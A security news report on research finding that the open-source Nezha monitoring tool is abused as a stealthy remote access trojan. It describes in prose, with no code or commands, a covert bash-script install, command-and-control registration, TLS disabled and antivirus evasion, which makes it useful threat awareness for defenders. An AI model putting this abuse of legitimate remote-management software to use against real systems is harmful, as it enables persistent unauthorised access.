Nezha Monitoring Tool Used in Covert Cyberattacks

The open-source server monitoring application Nezha is increasingly being used as a covert post-exploration remote access trojan, according to new research released by the Swiss artificial intelligence-powered managed extended detection and response company Ontinue AG.

Originally created for the Chinese IT community, Nezha is continuously maintained and has amassed around 10,000 stars on GitHub. Systems administrators use the program to monitor several servers, keep tabs on resource utilization, get alerts, and carry out remote maintenance.

The issue with Nezha is that, despite its legal use, attackers are increasingly using it to obtain high-privilege, persistent access to victim environments following an initial penetration.

By default, the Nezha agent gives attackers root access on Linux and system-level access on Windows. This includes enabling file management, interactive terminal sessions, and complete command execution without the need to escalate rights or exploit vulnerabilities.

The software is quite successful at getting over signature-based defenses because it is authentic and unaltered, as evidenced by the fact that it currently receives zero detections from major antivirus engines, including VirusTotal.

The malicious use of Nezha was detected by Ontinue’s researchers during an incident response engagement. The attackers attempted to deploy Nezha using a bash script that secretly installed the agent and connected it to infrastructure under their control.

To enable the agent to register with the Nezha dashboard, the script contained configuration parameters that pointed to a command-and-control server and a shared authentication secret.

The deployment used a GitHub proxy service and turned off TLS, according to the complaint, though it’s unclear why.

Subsequent analysis revealed that the incident’s exposed Nezha dashboard seemed to control hundreds of endpoints, indicating extensive compromise. The infrastructure was housed on Alibaba Cloud IP space that was geolocated to Japan, demonstrating how easy malevolent operations may be incorporated into trustworthy cloud settings.

Nezha’s architecture, which integrates web dashboard traffic with agent communications across a single port utilizing conventional HTTP and gRPC protocols, produces network activity that closely mimics typical monitoring telemetry, according to testing.

Attackers can retain persistent access while avoiding clear command-and-control signs because it appears legitimate.

Mayuresh Dani, Security Research Manager at the Qualys Threat Research Unit, reported,

“The weaponization of Nezha reflects an emerging modern attack strategy where threat actors systematically abuse legitimate software to achieve persistence and lateral movement while evading signature-based defenses.”

“Networks where this server monitoring tool is pre-known defender teams might even overlook this anomalous activity,”

explains Dani.

“This is not novel at all, as this behavior has been seen in the past with the usage of ‘Living Off the Land’ techniques and remote monitoring and management tools such as TeamViewer.”